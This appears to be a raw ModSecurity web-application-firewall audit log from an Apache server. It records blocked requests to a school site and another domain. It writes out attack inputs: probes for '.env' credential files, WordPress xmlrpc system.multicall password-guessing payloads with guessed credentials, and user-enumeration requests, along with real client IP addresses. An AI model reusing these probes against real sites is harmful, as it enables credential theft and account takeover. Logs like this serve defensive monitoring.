Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bf78c561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf78c561-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913764363398 534 (- - -) Stopwatch2: 1747913764363398 534; combined=185, p1=158, p2=0, p3=0, p4=0, p5=26, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf78c561-Z-- --540eff67-A-- [22/May/2025:18:36:05 +0700] aC8MJeThJmFSRJ5-OZfZoAAAAFE 103.236.140.4 52864 103.236.140.4 8181 --540eff67-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --540eff67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --540eff67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913765534962 886 (- - -) Stopwatch2: 1747913765534962 886; combined=374, p1=333, p2=0, p3=0, p4=0, p5=41, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --540eff67-Z-- --6810f91c-A-- [22/May/2025:18:36:06 +0700] aC8MJuThJmFSRJ5-OZfZogAAAEA 103.236.140.4 52868 103.236.140.4 8181 --6810f91c-B-- GET /dev/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6810f91c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6810f91c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913766648081 773 (- - -) Stopwatch2: 1747913766648081 773; combined=320, p1=281, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6810f91c-Z-- --ef6ab877-A-- [22/May/2025:18:36:07 +0700] aC8MJ-ThJmFSRJ5-OZfZowAAAFM 103.236.140.4 52870 103.236.140.4 8181 --ef6ab877-B-- GET /application/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ef6ab877-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef6ab877-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913767552030 703 (- - -) Stopwatch2: 1747913767552030 703; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef6ab877-Z-- --02f84529-A-- [22/May/2025:18:44:50 +0700] aC8OMn0O04WKE1HJ5iR1FAAAABg 103.236.140.4 53394 103.236.140.4 8181 --02f84529-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --02f84529-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel1234FaAdHeL --02f84529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02f84529-E-- --02f84529-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747914290295497 6234 (- - -) Stopwatch2: 1747914290295497 6234; combined=4347, p1=536, p2=3635, p3=0, p4=0, p5=103, sr=103, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02f84529-Z-- --6e2cdb28-A-- [22/May/2025:18:48:03 +0700] aC8O8-ThJmFSRJ5-OZfaJgAAAEM 103.236.140.4 53524 103.236.140.4 8181 --6e2cdb28-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6e2cdb28-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelMeseofaadhel@21 --6e2cdb28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e2cdb28-E-- --6e2cdb28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747914483383691 6317 (- - -) Stopwatch2: 1747914483383691 6317; combined=4516, p1=532, p2=3729, p3=0, p4=0, p5=152, sr=90, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e2cdb28-Z-- --b67d4434-A-- [22/May/2025:18:49:23 +0700] aC8PQ-ThJmFSRJ5-OZfaKAAAAFM 103.236.140.4 53642 103.236.140.4 8181 --b67d4434-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b67d4434-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel16!# --b67d4434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b67d4434-E-- --b67d4434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747914563568019 6182 (- - -) Stopwatch2: 1747914563568019 6182; combined=4419, p1=525, p2=3668, p3=0, p4=0, p5=135, sr=86, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b67d4434-Z-- --7444452d-A-- [22/May/2025:18:54:15 +0700] aC8QZ-ThJmFSRJ5-OZfaTwAAAE0 103.236.140.4 53820 103.236.140.4 8181 --7444452d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7444452d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel!@#$%^&*() --7444452d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7444452d-E-- --7444452d-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1747914855162781 3408 (- - -) Stopwatch2: 1747914855162781 3408; combined=2495, p1=258, p2=2098, p3=16, p4=17, p5=63, sr=47, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7444452d-Z-- --f12d3904-A-- [22/May/2025:18:55:16 +0700] aC8QpGfriXjg62qQwE9k4QAAAIY 103.236.140.4 53870 103.236.140.4 8181 --f12d3904-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 128.199.168.182 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 128.199.168.182 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f12d3904-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel&faadhel& --f12d3904-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --f12d3904-E-- --f12d3904-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1747914916586154 6113 (- - -) Stopwatch2: 1747914916586154 6113; combined=4944, p1=504, p2=4129, p3=38, p4=43, p5=139, sr=87, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f12d3904-Z-- --fd94eb19-A-- [22/May/2025:18:59:08 +0700] aC8RjH0O04WKE1HJ5iR1NAAAABE 103.236.140.4 53984 103.236.140.4 8181 --fd94eb19-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fd94eb19-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1688antix --fd94eb19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd94eb19-E-- --fd94eb19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915148262604 4606 (- - -) Stopwatch2: 1747915148262604 4606; combined=3560, p1=370, p2=3019, p3=0, p4=0, p5=100, sr=72, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd94eb19-Z-- --efdaff69-A-- [22/May/2025:18:59:19 +0700] aC8Rl30O04WKE1HJ5iR1NgAAABM 103.236.140.4 53990 103.236.140.4 8181 --efdaff69-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 142.4.0.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 142.4.0.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --efdaff69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efdaff69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915159982180 2132 (- - -) Stopwatch2: 1747915159982180 2132; combined=1076, p1=359, p2=686, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efdaff69-Z-- --a5b8c36d-A-- [22/May/2025:19:08:45 +0700] aC8TzeThJmFSRJ5-OZfakAAAAEo 103.236.140.4 54378 103.236.140.4 8181 --a5b8c36d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a5b8c36d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel75! --a5b8c36d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5b8c36d-E-- --a5b8c36d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915725842391 7910 (- - -) Stopwatch2: 1747915725842391 7910; combined=5321, p1=736, p2=4384, p3=0, p4=0, p5=118, sr=136, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5b8c36d-Z-- --a1355d18-A-- [22/May/2025:19:13:03 +0700] aC8Uz30O04WKE1HJ5iR1TQAAAA8 103.236.140.4 54542 103.236.140.4 8181 --a1355d18-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.194.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.194.26 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a1355d18-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel061177 --a1355d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1355d18-E-- --a1355d18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.194.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747915983327586 6411 (- - -) Stopwatch2: 1747915983327586 6411; combined=4355, p1=552, p2=3618, p3=0, p4=0, p5=111, sr=91, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1355d18-Z-- --37e33f54-A-- [22/May/2025:19:13:48 +0700] aC8U_H0O04WKE1HJ5iR1UAAAABI 103.236.140.4 54570 103.236.140.4 8181 --37e33f54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.156.227.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.156.227.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --37e33f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37e33f54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916028624706 3494 (- - -) Stopwatch2: 1747916028624706 3494; combined=1447, p1=525, p2=890, p3=0, p4=0, p5=32, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37e33f54-Z-- --d1561662-A-- [22/May/2025:19:16:40 +0700] aC8VqCektx75wRFPQyj9YgAAANE 103.236.140.4 54674 103.236.140.4 8181 --d1561662-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.139.192.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.139.192.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1561662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1561662-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916200491750 2172 (- - -) Stopwatch2: 1747916200491750 2172; combined=1055, p1=353, p2=676, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1561662-Z-- --70df354d-A-- [22/May/2025:19:18:42 +0700] aC8WIn0O04WKE1HJ5iR1WwAAAAM 103.236.140.4 54752 103.236.140.4 8181 --70df354d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.194.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.194.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --70df354d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel11! --70df354d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70df354d-E-- --70df354d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.194.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916322872705 5801 (- - -) Stopwatch2: 1747916322872705 5801; combined=4468, p1=512, p2=3772, p3=0, p4=0, p5=108, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70df354d-Z-- --d457f033-A-- [22/May/2025:19:29:53 +0700] aC8YwX0O04WKE1HJ5iR1fwAAAAQ 103.236.140.4 55262 103.236.140.4 8181 --d457f033-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.141.98.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.141.98.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d457f033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d457f033-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747916993908645 2856 (- - -) Stopwatch2: 1747916993908645 2856; combined=1248, p1=418, p2=802, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 